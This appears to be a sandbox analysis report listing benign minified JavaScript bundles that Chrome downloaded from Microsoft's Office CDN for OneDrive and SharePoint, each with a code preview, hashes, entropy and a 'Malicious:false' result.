                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1078],{2507:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return i},c:function(){return o}});var a=n(6080),i={NONE:0,COUNT:1,AVG:2,MAX:3,MIN:4,SUM:5,STDEV:6,VAR:7},r=["NONE","COUNT","AVG","MAX","MIN","SUM","STDEV","VAR"];function o(e){return e=e?e.toUpperCase():e,a[e]||""}}.,2598:function(e,t,n){n.d(t,{a:function(){return d},b:function(){return l},c:function(){return u},d:function(){return p}});var a=n(2544),i=n(1292),r=n(807),o=n(6079),s=n("odsp.util_578"),c=n(2507);function d(e,t,n,a){for(var i=[],r=0,o=void 0,s=void 0,c=(n=n||t.groupBy)[0],d=n[1],l=0,f=e;l<f.length;l++){var p=f[l];if(c&&"1"===p[c+".newgroup"]){var m=u(t,p,c,0,!0,r,void 0,a);i.push(m),r+=m.count,o=m,s=void 0}d&&"1"===p[d+".newgroup"]&&(s=u(t,p,d,1,!0,s?s.startIndex+s.count:o?o.startIndex:0,o,a))}return{groups:i,totalCount:r}}function l(e,t,n,a,i,r){if((a=a||n.groupBy)&&a.length>0){var o=t&&t.length>0?t[t.length-1]:void 0,s=a[0]
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (9359)
                              Category:downloaded
                              Size (bytes):12672
                              Entropy (8bit):5.247036491409534
                              Encrypted:false
                              SSDEEP:
                              MD5:DC6487E4B64DECD70BF2D12731E0D77E
                              SHA1:3D452A1ACEB502A65D17E0E86DFE281C4B4E0F91
                              SHA-256:E5F712B71B531CF1F87D59C94B02A7FD180470CDF2A237CE77C73AA9923F2283
                              SHA-512:AFABAB679E58F7896C384F5DE9DFDC453A2C1764565B6B012AAF4BF04422E4DFD314A565925DFBC3440501A6E0C36BF03D9BD3B9F775ECB5CF8491238C41E3B9
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/42.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[42],{1082:(e,t,n)=>{n.d(t,{a:()=>c});var a=n(503),i=n("odsp.util_578"),r=n(278),o=["AppendOnly","ClientSideComponentId","CommaSeparator","CustomFormatter","CustomUnitName","CustomUnitOnRight","DateFormat","Decimals","Description","DisplayName","EnforceUniqueValues","FieldRef","FillInChoice","FriendlyDisplayFormat","Format","Indexed","IsModern","IsolateStyles","IsRelationship","InternalName","LCID","List","Max","MaxLength","Min","Mult","Name","NumLines","Percentage","RelationshipDeleteBehavior","Required","RichText","RichTextMode","ShowField","StaticName","TimeFormat","Title","Type","Unit","UnlimitedLengthInDocumentLibrary","UserDisplayOptions","UserSelectionMode","UserSelectionScope"],s=["Choices","DefaultValue","DefaultFormula","FieldRefsXml","Validation"];const c=function(){function e(){var e=this;this._formatProperties={Field:{attributeKeys:o,childElementKeys:s,valueTransformer:function(t){return e.assembl
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (2289)
                              Category:downloaded
                              Size (bytes):2362
                              Entropy (8bit):4.890079507536325
                              Encrypted:false
                              SSDEEP:
                              MD5:BBDDF656D821DED989CF59BC3C6B676E
                              SHA1:7EF84FB576A30B0C4870CA6B9594808E96EA102F
                              SHA-256:B14B6E4328CF609E28A7ADD2CC13C896717A66260669FBB03F73652819F4BCD4
                              SHA-512:A77850717CF1B5E10CBCF7DF1A96B40787B1610BD385A9F2CC9CB5ADFC99DAB4D7776651E6C69DA8E1463AEEE08754DB86DC947F12CD2590F7677249CACFD50C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/fr/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{7763:e=>{e.exports=JSON.parse('{"introPageHeaderText":"Ajouter Microsoft Teams","selectPageHeaderText":".pingler des ressources sous forme d.onglets dans Teams","introPageDescription1":"Int.grez des ressources de ce site dans Teams pour une collaboration en temps r.el sur un emplacement unique. ","introPageSecondHeader":"Teams vous permet de facilement:","introPagePoint1":"Discuter avec vos coll.gues","introPagePoint2":"Organiser des r.unions en ligne avec des partenaires","introPagePoint3":"Collaborer sur du contenu partag.","selectPageDescription":"Ajoutez des pages, des listes et des biblioth.ques de documents sous la forme d.onglets dans Teams pour rendre les ressources partag.es facilement disponibles pour les collaborateurs. Une fois dans Teams, les ressources dans les onglets peuvent .tre ajout.es, supprim.es ou r.organis.es.","continueButtonText":"Continuer","addTeam
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5830)
                              Category:downloaded
                              Size (bytes):7954
                              Entropy (8bit):5.325729306192756
                              Encrypted:false
                              SSDEEP:
                              MD5:57B9D199AD77C1AF5336C83BC644975C
                              SHA1:43F77F4DCF876DD076DC9BCC58566BEC64B0DB45
                              SHA-256:55EB28DDD6C3ECCE8D9A5AA34145DC85B460EB136F8376AA5E43E36867AFADBF
                              SHA-512:A5D45E85FA38465B09A2153BE141ED0DE0DA348374E42EC7609ED1CB5B0367B01FE5AF79120D9126B2E3638C0F7535EB713C7EE3DB57ACE56E3764F817D9AC69
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/50.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[50],{6346:function(e,t,n){n.d(t,{a:function(){return _}});var a=n("tslib_102"),i=n(1241),r=n(1e3),o=n(504),s=n(4621),c=(n(1046),n(525),n(1047),n(1232)),d=n(1234),l=n(92),u=n(108);n(90),(0,c.a)(),d.a.init();var f=n(649),p=n(1240),m=(0,s.a)();function _(e){var t=e.initOneDS;if(e.spPageContext){var n={context:(0,a.W_)((0,a.W_)({},(0,r.a)({viewParams:e.viewParams,clientName:e.clientName})),e.context||{}),pageContext:e.spPageContext,customManage:m,initOneDS:t};(0,i.a)(n)}else!function(e){var t="",n=window.PageContext,i=(null==n?void 0:n.env)||"devbox",r=window.Flight;if(r)if(r.ramps&&!r.Ramps&&(r.Ramps=r.ramps),r.usingRedirectCookie)t=e.tokens.ppe;else switch(i.toLowerCase()){case"edog":case"dogfood":case"prodbubble":t=e.tokens.ppe;break;case"prod":case"dprod":t=e.tokens.prod}else t=e.tokens.prod;var s=function(e){var t=window.PageContext,n=t.env||"devbox",a=window.Flight,i=e.oAuthToken&&function(e){if(e){var t=e.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (22063)
                              Category:downloaded
                              Size (bytes):66539
                              Entropy (8bit):5.074246928950826
                              Encrypted:false
                              SSDEEP:
                              MD5:A9551E22B0385DE7C03FD5BDDBB51B45
                              SHA1:A6A452D221D5D5B061DC536709C7FE224A887B32
                              SHA-256:30A9E18C205B0B963BAAEFD1884D9D2E314D6E76411AD3789AE0D638B405198E
                              SHA-512:46A8335095D447ED87FC748E97AF03703145287ECABC08E670297327D679B76162952588A5C6DC1737F703FE6A1E2280647374534FC1E171260B1B20B80E15A1
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/de/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{3394:e=>{e.exports=JSON.parse('{"a":"Ein Problem ist aufgetreten"}')}.,3818:e=>{e.exports=JSON.parse('{"a":"Im Plastischen Reader .ffnen"}')}.,3434:e=>{e.exports=JSON.parse('{"b":"Verkn.pfung zu .Meine Dateien. hinzuf.gen","d":"Verkn.pfung zu OneDrive hinzuf.gen","n":"Entfernen","p":"Verkn.pfung aus \\u0022Meine Dateien\\u0022 entfernen","y":"Aus freigegebener Liste entfernen","a":"Hinzuf.gen einer Verkn.pfung zu diesem Ordner in .Meine Dateien.","o":"Entfernen der Verkn.pfung zu diesem Ordner aus .Meine Dateien.","c":"Hinzuf.gen einer Verkn.pfung zu diesem Ordner in OneDrive","m":"Entfernen der ausgew.hlten Verkn.pfung von diesem Speicherort","f":"Verkn.pfung zu Alben hinzuf.gen","e":"Hinzuf.gen einer Verkn.pfung zu diesem freigegebenen Album in Alben","k":"Dateispeicherort .ffnen","t":"Datum","s":"Beliebiges Datum","u":"Letzte 24 Stunden","w":"Letzte Woche","v
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4692)
                              Category:downloaded
                              Size (bytes):20657
                              Entropy (8bit):5.3925309478575745
                              Encrypted:false
                              SSDEEP:
                              MD5:C9E9395CE1DEC59DB9CF6F62933B4E4A
                              SHA1:3C3F1BF36FD1FE4C3AA88CD61F3B44CDE3E657C5
                              SHA-256:CA3F84E3C8764BE4488A16B9B4B624183413E156CD2FB457354319C3CD0320E5
                              SHA-512:9A8E21141C85B8BFAEEAE93F6C0FAEB91455747E00C9662F63771FF0DB1207ADEC5F4E0794E17AE8D86FB6816062EA9B440273EEEA026F7D4933A8A08C057FE2
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/172.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[172,1558,1610],{2607:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return r},c:function(){return a}});var a={none:0,allow:1,allowWithJustification:2},i={none:0,falsePositiveReported:1,overridden:2,falsePositiveReportedAndOverridden:3},r={override:0,reportFalsePositive:1}}.,2194:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i}});var a,i={queued:0,started:1,completed:2,aborted:3,failed:4,none:5};!function(e){e[e.none=0]="none",e[e.other=1]="other",e[e.general=2]="general",e[e.conflict=3]="conflict",e[e.similarNameExists=4]="similarNameExists",e[e.invalidName=5]="invalidName",e[e.fileSize=6]="fileSize",e[e.emptyFileOrFolder=7]="emptyFileOrFolder",e[e.emptyFileOrFolderForDocLib=8]="emptyFileOrFolderForDocLib",e[e.overQuota=9]="overQuota",e[e.accessDenied=10]="accessDenied",e[e.lockMismatch=11]="lockMismatch",e[e.overQuotaSharedFolder=12]="overQuotaSharedFolder",e[e.folderUploadNot
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8047)
                              Category:downloaded
                              Size (bytes):9885
                              Entropy (8bit):5.150373973159124
                              Encrypted:false
                              SSDEEP:
                              MD5:EA469254FF0C549FB544518A65470D9A
                              SHA1:F9EF9F72FC720370FFC970C4B5ECDCE0F95E9D7F
                              SHA-256:E5FD7DA6F3209DAB69C5FB16204F795B2DFB9495454A43D825F7E9B86CD873B6
                              SHA-512:55FCC24F8AE109347032487BF135E3395F59C1239210C97C817417434EC84F12B6C0E4D0B7F277E9E31BBB23F1C3A1608746A57A176355C11A28B620781C21F2
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/75.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[75],{827:(e,t,n)=>{n.d(t,{a:()=>s});var a=n("tslib_102"),i=n(38),r=n(2063),o=function(e){function t(t,n){var a=e.call(this,{webAbsoluteUrl:n.pageContext.webAbsoluteUrl,encodeWebAbsoluteUrl:n.encodeWebAbsoluteUrl})||this;return a._pageContext=n.pageContext,a._shouldEncodeWebAbsoluteUrl=n.encodeWebAbsoluteUrl,a._itemUrlHelper=n.itemUrlHelper,a}return(0,a.XJ)(t,e),t.prototype.webByUrl=function(e){return this.webByItemUrl(this._itemUrlHelper.getUrlParts(e))},t.prototype.webByItemUrl=function(e){var t=e.siteRelation,n=e.isCrossDomain,a=e.fullItemUrl,r=this;return(n||t===i.d.crossSite)&&(r=r.method("SP.RemoteWeb",a)),r.segment("web")},t.prototype.listById=function(e,t){return this.webByItemUrl(e).segment("lists").method("GetById",t)},t.prototype.clone=function(){return new t({webAbsoluteUrl:this._pageContext.webAbsoluteUrl},{pageContext:this._pageContext,itemUrlHelper:this._itemUrlHelper,encodeWebAbsoluteUrl:this._
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (20511)
                              Category:downloaded
                              Size (bytes):20516
                              Entropy (8bit):5.404374432656291
                              Encrypted:false
                              SSDEEP:
                              MD5:00B40517C8C9BA5F09CC6012E8C9C247
                              SHA1:2419279C0E463B9E4C6414AE528EF945106F9538
                              SHA-256:864EECE3FD4F474845632D9BC1F8FC926579957B5BA9DCA9B6556F3BDB0B8B2A
                              SHA-512:F8E8715CC8B8842E8CC7B3CC438614AC86C68734FEFA0D1338E39166969E6756779909BE3FFB24EC4957F1F30C5D17633D165804210A6F19D7242B5FBEF28C72
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/103.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[103],{715:(e,t,n)=>{n.r(t),n.d(t,{deferredSetup:()=>A,resourceKey:()=>E});var a=n(146),i=n("odsp.util_578"),r=n("tslib_102"),o=n(552),s=n(15),c=n("fui.util_150"),d=n(78),l=n(166),u=n(543),f=n(476),p=n(5),m=n(61),_=n(550),h=n(7),b=n(41),g={ODB:60222,ODC:null,Fallback:!1},v="88d7a955-6ccc-4b35-b8ff-342a6bb08f3b",y=i.HW.isActivated("6ce35856-96fa-409e-9292-912de2e7e615"),S=i.HW.isActivated("54d52105-eb9a-472b-98c2-17bc1192a994"),D=function(e){function t(n,a){var r=e.call(this,{dataSourceName:"SuiteNavDataSource"},a)||this;return r._suiteNavContext=n.suiteNavContext,r._suiteNavDataUpdater=n.suiteNavDataUpdater,r._suiteNavDataSourceBasic=n.suiteNavDataSourceBasic?n.suiteNavDataSourceBasic:new u.a(n,a),r._prefetchCache=a.prefetchCache,r.isAdditionalFeedbackKsActivated=i.HW.isActivated("45e4c761-cac2-442c-b789-ed37039a99bd","06/27/2023","Additional feedback metadata"),r._useDeadTabDetection()&&(r._signInTimeAtPageLo
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (9747)
                              Category:downloaded
                              Size (bytes):2947124
                              Entropy (8bit):5.457157511654837
                              Encrypted:false
                              SSDEEP:
                              MD5:92E4BA9BC3906EA9BDBFDFD376C51346
                              SHA1:7718C96060316CC6CAED94F1A472A85A366D851F
                              SHA-256:8AB8501446A34A19C1C5EE33DE2665F62A05B042C41E9CF84709AE54BCC4A0EC
                              SHA-512:88ED30EEC3206335651E130592946AC7746615CCF3DA367025F3B00D15F9B57E8FCEE04F39CD81CC6951E0B17096FC9D3337A1E8AD4AC3FBE0E465BFB3CA9F6E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/teamsodbfilebrowserv2.js
                              Preview:/*! For license information please see teamsodbfilebrowserv2.js.LICENSE.txt */.var __webpack_result__;(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["teamsodbfilebrowserv2"],[,,(e,t,n)=>{"use strict";n.d(t,{a:()=>o,b:()=>u,c:()=>l});var a=n("tslib_102"),i=n(0),r=n("fui.util_150"),o=function(e){function t(t,n){var i=e.call(this,"".concat(t,"Control"))||this;return i._reducer=function(e,t){return t&&e&&i._memoizer(t)(e)||t||e},i.controlOptions=n,i._memoizer=function(e){return(0,r.bQ)(function(t){return(0,r.bQ)(function(n){function i(i,r){var o=n(i,r),s={},c=(0,a.W_)({},r);for(var d in o)Object.prototype.hasOwnProperty.call(o,d)&&(s[d]=c[d]=o[d]);var l=t(i,c);for(var d in l)if(Object.prototype.hasOwnProperty.call(l,d)){var f=e[d];s[d]=f&&d in o&&f!==u?f.merge(o[d],l[d]):l[d]}return s}return i.previous=n,i.current=t,i})})}(n),i}return(0,a.XJ)(t,e),Object.defineProperty(t.prototype,"default",{get:function(){return c},enumerable:!1,configurable:!0}),t.get=function(e){return
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (50629)
                              Category:downloaded
                              Size (bytes):82841
                              Entropy (8bit):5.1819261496971585
                              Encrypted:false
                              SSDEEP:
                              MD5:2F2FA451577324E6AEE64C3C463BBC53
                              SHA1:63BCBCCF59B7F6DF0B9603F7C8E50AFE120E7A0E
                              SHA-256:8AEA95CFDD224A5D76AC6BD0DCE0660068440B04138FDE54D20F57B9737CAC6C
                              SHA-512:60B3E41583672EC49DE43D7BC2539DE911E95C4066C0A42CADE6A81CB20EE605F89C683B6FB5861C5E507F07A0AE062BABF215FDEE44F175BC74363560546ACD
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/192.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[192],{900:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(842);function i(e){return(0,a.a)(e())}}.,893:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>s});var a=n(830),i=n(324),r=n(829),o=new a.a("operation",{operationTypeId:i.b,keyFacetId:i.b});function s(e){var t=e.operationTypeFacet,n=e.keyFacet;return o.serialize({operationTypeId:t.id,keyFacetId:n.id})}function c(e){var t=o.deserialize(e),n=t.keyFacetId,a=t.operationTypeId;return{keyFacet:r.a.get(n),operationTypeFacet:r.a.get(a)}}}.,894:(e,t,n)=>{n.d(t,{a:()=>l,b:()=>d,c:()=>c});var a=n("tslib_102"),i=n(829),r=n(893),o=n("odsp.util_578"),s=n(895),c=new i.a("noRegisteredHandlerError");function d(e){var t=e.operationTypeFacet,n=e.keyFacet;return new s.a({message:"There is no operation handler registered for operation type '".concat(t.id,"' of key facet '").concat(n.id,"'."),isExpected:!0,facets:(0,a.W_)({},c.pack((0,r.b)({operationTypeFacet:t,keyFacet:n})))})}var l=function(e){function
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11213)
                              Category:downloaded
                              Size (bytes):12939
                              Entropy (8bit):5.141533209631394
                              Encrypted:false
                              SSDEEP:
                              MD5:44586188E22F6F6B95688A49F6B5DDEB
                              SHA1:A24DB4EB97F04B8D592FD6E458E475DFD3940E83
                              SHA-256:C65D53639ABA606FEC1B56397469BB9258B9E7CB2AE92C85985E5C26DE8A5EDD
                              SHA-512:F6468CFDFC091DE7CB0106577B94E2CAC026E681C191FFB784F38271DCA10C7ECA54608CFA9FDC0D2FF0010FC6949FED764318B91571C88D5251945AE952E47D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/36.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[36],{1130:(e,t,n)=>{n.d(t,{a:()=>g});var a=n(30),i=n("odsp.util_578"),r=n("tslib_102"),o=n(476),s=n(552),c=i.HW.isActivated("6dcc0b9e-bfb9-4308-8e6a-fab107fbb13a");const d=function(e){function t(t,n){var a=e.call(this,{},n)||this,i=t.apiUrlHelper,r=t.itemUrlHelper;return a._itemUrlHelper=r,a._apiUrlHelper=i,a._listUrl=t.listUrl,a}return(0,r.XJ)(t,e),t.prototype.getAttachments=function(e,t){var n=this;return this.getData(function(){return n.buildAttachmentBaseUrl(e).toString()},function(e){var t=JSON.parse(e);if(t&&t.d&&t.d.resultes&&0===t.d.results.length)return[];var a=t.d.results;return n.transformAttachmentData(a)},"Attachments")},t.prototype.addAttachment=function(e,t,n){var i=this;return new a.c(function(t,a){var r=new FileReader;r.onload=function(o){var s=r.result;i.doUploadAttachment(e,n.name,s).then(t,a)},r.readAsArrayBuffer(n)},function(){})},t.prototype.deleteAttachment=function(e,t,n,i){var r=this;
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (649)
                              Category:downloaded
                              Size (bytes):654
                              Entropy (8bit):5.051522776821604
                              Encrypted:false
                              SSDEEP:
                              MD5:031CC6D0D3037933433AA8534A684B59
                              SHA1:1D6D6B6C151D0BCA3A135292E8114A57CB4359CA
                              SHA-256:6B0160235A3C24880AFB657D4D87EEB35A32AEA319F82D2E40BD64A3665A3778
                              SHA-512:6492B63A9C0BC4DFE3B1DE7A187737DA87F280AFB6871D26E78083B5E09AD361351AA4B2F71528E2A07FF05C528AF00152FB30CD2563799C5D43702FFE230A9B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1040.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1040],{4180:function(e,t,n){n.r(t),n.d(t,{ContextualMenu:function(){return a.v2H},ContextualMenuBase:function(){return a.sIi},ContextualMenuItem:function(){return a.A55},ContextualMenuItemBase:function(){return a.cYW},ContextualMenuItemType:function(){return a.llj},DirectionalHint:function(){return a.aZJ},canAnyMenuItemsCheck:function(){return a.xQe},getContextualMenuItemClassNames:function(){return a.Wyu},getContextualMenuItemStyles:function(){return a.czg},getMenuItemStyles:function(){return a.CXU},getSubmenuItems:function(){return a.PkX}});var a=n("fui.lco_35")}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4139)
                              Category:downloaded
                              Size (bytes):13851
                              Entropy (8bit):5.275124979304216
                              Encrypted:false
                              SSDEEP:
                              MD5:64365E633BF7E1ABD11EE168214C3379
                              SHA1:68AA1889DAEADE4D5B719728A95A575060D1C9EB
                              SHA-256:EF13024DD41BBF1BADE343648058B122CEB40821CE3ABE3AA41DD1C3E5CE6781
                              SHA-512:538C764E75B9ADC61C0970C2DEB10AA93F4C3E495E1D43B1C77A183376CC26EA2ACB22D5A740BAB66C671AC17EB18D35559E1C7F038261010E280DC2B4922409
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1660.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1660,1558,1610],{2194:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i}});var a,i={queued:0,started:1,completed:2,aborted:3,failed:4,none:5};!function(e){e[e.none=0]="none",e[e.other=1]="other",e[e.general=2]="general",e[e.conflict=3]="conflict",e[e.similarNameExists=4]="similarNameExists",e[e.invalidName=5]="invalidName",e[e.fileSize=6]="fileSize",e[e.emptyFileOrFolder=7]="emptyFileOrFolder",e[e.emptyFileOrFolderForDocLib=8]="emptyFileOrFolderForDocLib",e[e.overQuota=9]="overQuota",e[e.accessDenied=10]="accessDenied",e[e.lockMismatch=11]="lockMismatch",e[e.overQuotaSharedFolder=12]="overQuotaSharedFolder",e[e.folderUploadNotSupported=13]="folderUploadNotSupported",e[e.versionMismatch=14]="versionMismatch",e[e.authFailure=15]="authFailure",e[e.fileHashMismatch=16]="fileHashMismatch",e[e.targetFolderMissing=17]="targetFolderMissing",e[e.itemNotFound=18]="itemNotFound",e[e.malwareDetected=19]
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (11293)
                              Category:downloaded
                              Size (bytes):541929
                              Entropy (8bit):5.033673073685323
                              Encrypted:false
                              SSDEEP:
                              MD5:EC40A144D6769AE53212EBF42FE64EA6
                              SHA1:B8A4E898090195B583C3AA65A0475292B3C1DDA2
                              SHA-256:F9C564106980C6356CCCA3CC435310109511E86A9F552AEB245E00707AFC62A0
                              SHA-512:96FEEB131FF3233F1B3E946D7B6BEA97C85241618C242411FAA9D33AB3591E021FE05A473A1FC51FE68136F1E33D217277EF323E6C871901122BADE45101FF74
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/en-gb/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{5223:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,5968:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11225)
                              Category:downloaded
                              Size (bytes):11230
                              Entropy (8bit):5.123706010864042
                              Encrypted:false
                              SSDEEP:
                              MD5:97601C7787268781B8177AB4BD262BB3
                              SHA1:0CAF2F045865196B00060ECDE16E019697742599
                              SHA-256:9A2DC0FE7009BC0B43F5A17E90E2A50BE352162EE15F88C56E6548B41983DE99
                              SHA-512:479363A3EB1864369C7A18F95B411CFD9055757D72F1A647FE44D72651E59376E2B9A3B9BFB453DB6872AD246B2E9C41EF760D79CB355B2083B227D5BFA04ABB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/22.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[22],{3848:function(e,t,n){n.d(t,{a:function(){return g}});var a=n(23),i=n("odsp.util_578"),r=n("tslib_102"),o=n(1333),s=n(174),c=i.HW.isActivated("6dcc0b9e-bfb9-4308-8e6a-fab107fbb13a"),d=function(e){function t(t,n){var a=e.call(this,{},n)||this,i=t.apiUrlHelper,r=t.itemUrlHelper;return a._itemUrlHelper=r,a._apiUrlHelper=i,a._listUrl=t.listUrl,a}return(0,r.XJ)(t,e),t.prototype.getAttachments=function(e,t){var n=this;return this.getData(function(){return n.buildAttachmentBaseUrl(e).toString()},function(e){var t=JSON.parse(e);if(t&&t.d&&t.d.resultes&&0===t.d.results.length)return[];var a=t.d.results;return n.transformAttachmentData(a)},"Attachments")},t.prototype.addAttachment=function(e,t,n){var i=this;return new a.c(function(t,a){var r=new FileReader;r.onload=function(o){var s=r.result;i.doUploadAttachment(e,n.name,s).then(t,a)},r.readAsArrayBuffer(n)},function(){})},t.prototype.deleteAttachment=function(e,t,
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (695)
                              Category:downloaded
                              Size (bytes):700
                              Entropy (8bit):5.323030237008244
                              Encrypted:false
                              SSDEEP:
                              MD5:F400F53F9996CB6A78594DD99F0D4653
                              SHA1:1F25A9ED1459A5E7CF2D38933929FA02F96B093B
                              SHA-256:E0878128831BF7DE1F4F9E58A123E3E11B720192C6456E60D39EEC46DCADEB92
                              SHA-512:BB26096F13A63AB7F4E1911212EE4AE39FC44B82B43C9388969C7147576C0ADCA9134666CBAE9ABADD27A626BF343E4119BD1F28091EDD647689A1851F54D851
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/232.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[232],{2273:(e,t,n)=>{n.r(t),n.d(t,{resourceKey:()=>u});var a=n(89),i=n(65),r=n(276),o=n("odsp.util_578"),s=n(1469),c=n(21),d=n(1173),l=n(153),u=new o.qT({name:"DropActionControlHandler",factory:new o.bF(function(e,t){if((0,c.Kh)(c.gh))return{};if(t.handlers&&function(e,t){var n=(0,l.a)(e);if(n&&t.itemKey){var o=(0,d.a)(e,{itemKey:t.itemKey}).itemKey;if(o){var s=a.a.deserialize(o).webAbsoluteUrl;return new r.a({},{pageContext:n}).getUrlParts({webUrl:s}).geoRelation===i.a.crossGeo}}return!1}(e,t)){for(var n=[],o=0,u=t.handlers;o<u.length;o++){var f=u[o];f.key!==s.a.key&&n.push(f)}return{handlers:n}}return{}})})}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8467)
                              Category:downloaded
                              Size (bytes):9602
                              Entropy (8bit):5.5799286449292556
                              Encrypted:false
                              SSDEEP:
                              MD5:A1B2A3DBE0FA22D08DF53E8BB626FA92
                              SHA1:AB477F6C51A4BEA54BBD1775BED6A8902FB0BF5A
                              SHA-256:F5FEB6FF805C7C46B05E915628BAA2F68CC1375B1BB713A7E319A71212F906C5
                              SHA-512:C804343DEC304967BD5A9E14DFBAFD7905A918886C8B2696B30F203E625A2E8665A31BE87884B4BED119FFBBC2D9D7C86BFF7EFDDB097C9846BD55674AFF22DA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/12906.js
